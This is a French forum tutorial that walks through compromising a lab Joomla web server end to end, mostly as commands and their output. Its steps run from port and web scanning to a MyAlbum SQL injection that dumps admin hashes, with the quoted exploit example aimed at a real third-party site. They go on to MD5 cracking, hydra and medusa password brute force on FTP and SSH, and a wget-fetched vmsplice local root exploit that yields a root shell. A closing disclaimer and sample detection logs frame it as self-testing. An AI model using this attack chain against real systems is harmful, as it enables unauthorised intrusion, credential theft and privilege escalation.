Nous allons commencer par utiliser quelques outils pour collecter des infos sur le server.
- httprint
- dimitry
http://wiki.backtrack-fr.net/index.php/DMitry- nmap
http://wiki.backtrack-fr.net/index.php/Nmap- amap
http://wiki.backtrack-fr.net/index.php/AmapCode:
bt linux # httprint -h 192.168.1.44 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/httprint@net-square.comFinger Printing on
http://192.168.1.44:80/Finger Printing Completed on
http://192.168.1.44:80/--------------------------------------------------
Host: 192.168.1.44
Derived Signature:
Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
811C9DC568D17AAE811C9DC5811C9DC5811C9DC5505FCFE84276E4BB630A04DB
0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5
68D17AAE68D17AAE68D17AAE811C9DC5E2CE6927050C5D3368D17AAE9E431BC8
6ED3C29568D17AAE2A200B4C68D17AAE68D17AAE68D17AAE68D17AAEE2CE6923
E2CE692368D17AAE811C9DC5E2CE6927E2CE6923
Banner Reported: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
Banner Deduced: Lotus-Domino/6.x
Score: 92
Confidence: 55.42
------------------------
Code:
bt ~ # dmitry -p -b 192.168.1.44
Deepmagic Information Gathering Tool
"There be some deep magic going on"
HostIP:192.168.1.44
HostName:joomla12
Gathered TCP Port information for 192.168.1.44
---------------------------------
Port State
21/tcp open
>> 220 Welc0m3 To The SUp3r S3cuRe's Ftp S3rVer
22/tcp open
>> SSH-2.0-OpenSSH_4.3p2 Debian-9
80/tcp open
.....
Code:
bt bin # amap -bvq 192.168.1.44 80
Using trigger file /usr/local/etc/appdefs.trig ... loaded 30 triggers
Using response file /usr/local/etc/appdefs.resp ... loaded 346 responses
Using trigger file /usr/local/etc/appdefs.rpc ... loaded 450 triggers
amap v5.2 (www.thc.org/thc-amap) started at 2008-09-15 17:35:02 - MAPPING mode
Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.44:80/tcp (by trigger http) matches http - banner: HTTP/1.1 302 Found\r\nDate Mon, 15 Sep 2008 172821 GMT\r\nServer Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8\r\nLocation http//127.0.1.1/apache2-default/\r\nContent-Length 368\r\nConnection close\r\n
....
amap v5.2 finished at 2008-09-15 17:35:11
Code:
bt ~ # nmap -sSV -P0 192.168.1.44
Starting Nmap 4.50 (
http://insecure.org ) at 2008-09-15 17:44 CEST
Interesting ports on joomla12 (192.168.1.44):
Not shown: 1706 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd or WU-FTPD
22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.
111/tcp open rpcbind 2 (rpc #100000)
113/tcp open ident OpenBSD identd
MAC Address: 00:02:A5:23:CE:94 (Compaq Computer)
Service Info: OSs: Linux, OpenBSD
Service detection performed. Please report any incorrect results at
http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.378 seconds
Suite à cette collecte d'information nous constatons que nous avons un Server web Apache 2.2.3, sur une machine debian etch, avec un service ftp VSFTPD ou WU-ftpd et un service ssh openSSH.
Nous allons donc maintenant tester le site web tournant sur cette machine avec nikto.
- nikto
http://wiki.backtrack-fr.net/index.php/NiktoCode:
bt nikto # ./nikto.pl -e 1 -host
http://192.168.1.44/joomla12 -F txt -o nickojoom.txt
---------------------------------------------------------------------------
- Nikto 2.01/2.01 - cirt.net
+ Target IP: 192.168.1.44
+ Target Hostname: joomla12
+ Target Port: 80
+ Using IDS Evasion: Random URI encoding (non-UTF8)
+ Start Time: 2008-09-16 10:26:17
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
- Root page / redirects to:
http://joomla12/apache2-default/- Retrieved X-Powered-By header: PHP/5.2.0-8+etch10
+ /robots.txt - contains 13 'disallow' entries which should be manually viewed (added to mutation file lists) (GET).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.6). Apache 1.3.39 and 2.0.61 are also current.
+ mod_python/3.2.10 appears to be outdated (current is at least 3.3.1)
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ mod_perl/2.0.2 appears to be outdated (current is at least 5.8.0)
+ OSVDB-0: GET /joomla12/help/ : Help directory should not be accessible
+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
+ OSVDB-8193: GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc : EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-12184: GET /joomla12/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: GET /joomla12/administrator/ : This might be interesting...
+ OSVDB-3092: GET /joomla12/includes/ : This might be interesting...
+ OSVDB-3093: GET /joomla12/index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?topic=<script>alert(document
+ OSVDB-3761: GET /joomla12/?pattern=/etc/*&sort=name : The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.
+ 2963 items checked: 22 item(s) reported on remote host
+ End Time: 2008-09-16 10:27:08 (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Le rapport nous informe qu'il pourrait y avoir des vulnérabilité. A nous de les tester et de les découvrir smile
Code:
+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
On va commencer par cela et en surfant sur le site on découvre le nom du composant joomla qui est MyAlbum
(hxxp://192.168.1.44/joomla12/index.php?option=com_myalbum&Itemid=26)
Une petite recherche sur milw0rm nous permettra de trouver un exploit s'il existe.
Code:
bt Desktop # ./milwormsearch.sh Joomla myalbum
************************************************
* Explorateur d'exploit sur Milw0rm *
* by s3th *
************************************************
exploit: Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
Link :
http://www.milw0rm.com/exploits/5318Voulez-vous afficher l'exploit dans firefox (F) ou à l'écran (E) ou quitter (Q) :
e
<html><head><title>Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability</title></head><pre>-------------------------------------------------------------------------------------------------
# Title : Joomla Component MyAlbum SQL Injection Vulnerability
# Author : parad0x
# D.Page :
http://joomlacode.org/gf/project/myalbum/-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&album=[SQL]-------------------------------------------------------------------------------------------------
Example:
http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
http://inso.host.sk# milw0rm.com [2008-03-28]</pre></html>
Nous allons donc tester cette injection sur notre site : -1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
Code:
http://192.168.1.44/joomla12/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
et décvouvrir le pass admin smile qui est un MD5
admin e10adc3949ba59abbe56e057f20f883e
Nous allons voir pourquoi il est important de bien choisir son mot de passe, car si le mot est trop faible il sera cassé par un soft comme johntheripper ou alors il existera dans une base de crack en ligne.
- johntheripper
http://wiki.backtrack-fr.net/index.php/John_The_RipperCode:
bt Desktop # ./md5crack.sh e10adc3949ba59abbe56e057f20f883e
************************************************
* MD5crack online *
* by s3th *
************************************************
Plain text: 123456
Maintenant que nous avons la possiblité de nous logguer en tant qu'admin sur le site, il ne nous reste plus qu'à uploader un script qui nous permette de lancer des commande shell ou une Backdoor et rechercher des infos intéressantes sur le server..
cat /etc/passwd
Code:
s3th:x:1000:1000:s3th,,,:/home/s3th:/bin/bash
mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
ftp:x:110:65534::/home/ftp:/bin/false
ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
snort:x:112:115:Snort IDS:/var/log/snort:/bin/false
uname -a
Code:
Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
Maintenant que nous avons un user "s3th" on va pouvoir faire une attaque sur le ftp ou le ssh avec :
- hydra
http://wiki.backtrack-fr.net/index.php/Hydra/Hydra-gtk- medusa
Code:
bt Desktop # hydra -l s3th -P ../arbeit/dict 192.168.1.44 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2008-09-17 11:21:39
[DATA] 16 tasks, 1 servers, 30206 login tries (l:1/p:30206), ~1887 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
[STATUS] attack finished for 192.168.1.44 (waiting for childs to finish)
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
Hydra (http://www.thc.org) finished at 2008-09-17 11:21:46
Code:
bt Desktop # medusa -h 192.168.1.44 -u s3th -P ../arbeit/dict -M ssh
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 1234 (1/30206)
ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 123456 (2/30206)
ACCOUNT FOUND: [ssh] Host: 192.168.1.44 User: s3th Password: 123456 [SUCCESS]
maintenant qu'on a un compte et un pass SSH, il ne nous reste plus qu'à nous logguer:
Code:
bt ~ # ssh
s3th@192.168.1.44s3th@192.168.1.44's password:
Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Sep 15 11:28:45 2008
voila il ne nous reste plus qu'à trouver un pti sploit smile
Code:
s3th@debian:~$ whoami
s3th
s3th@debian:~$ cd /tmp/
s3th@debian:/tmp$ wget 192.168.1.39/vmsplice-local-root-exploit.c
--13:21:50--
http://192.168.1.39/vmsplice-local-root-exploit.c => `vmsplice-local-root-exploit.c'
Connexion vers 192.168.1.39:80...connecté.
requête HTTP transmise, en attente de la réponse...200 OK
Longueur: 6'293 (6.1K) [text/x-c]
100%[=============================================================================================>] 6'293 --.--K/s
13:22:42 (198.77 KB/s) - « vmsplice-local-root-exploit.c » sauvegardé [6293/6293]
s3th@debian:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
s3th@debian:/tmp$ ./vmsplice-local-root-exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e32000 .. 0xb7e64000
[+] root
root@debian:/tmp# whoami
root
Ce tuto n'a pour but que d'informer qu'un système mal configuré est vulnérable smile.
N'essayez pas ces techniques sur des machines ne vous appartenant pas.
Tout ce que vous faites sera loggé sur la machine.
exemple de log
Code:
192.168.1.39 - - [15/Sep/2008:11:55:30 +0200] "GET /joomla12/MAINTAINERS.txt HTTP/1.0" 404 372 "-" "Mozilla/4.75 (Nikto/2.01 )"
192.168.1.39 - - [15/Sep/2008:11:55:30 +0200] "GET /joomla12/sites/default/settings.php HTTP/1.0" 404 383 "-" "Mozilla/4.75 (Nikto/2.01 )"/joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../etc HTTP/1.1" 200 21393 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
192.168.1.39 - - [15/Sep/2008:11:58:07 +0200] "GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc HTTP/1.1" 200 21460 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
[**] [119:2:1] (http_inspect) DOUBLE DECODING ATTACK [**]
09/15-11:50:04.553916 192.168.1.39:34912 -> 192.168.1.44:80
TCP TTL:64 TOS:0x8 ID:60741 IpLen:20 DgmLen:264 DF
***AP*** Seq: 0x9F333580 Ack: 0x91AAD632 Win: 0x2E TcpLen: 32
TCP Options (3) => NOP NOP TS: 776253 295742092
[**] [1:1560:6] WEB-MISC /doc/ access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
09/15-11:50:05.345233 192.168.1.39:35061 -> 192.168.1.44:80
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:207
***AP*** Seq: 0x9F2992AC Ack: 0x919D463E Win: 0x38 TcpLen: 20
[Xref =>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0678][Xref =>
http://www.securityfocus.com/bid/318]
Sujet: # Tutos et Howto # » [TUTO] Test de la sécurité de son site + server WEB par s3th 
Mer 20 Mai - 2:42
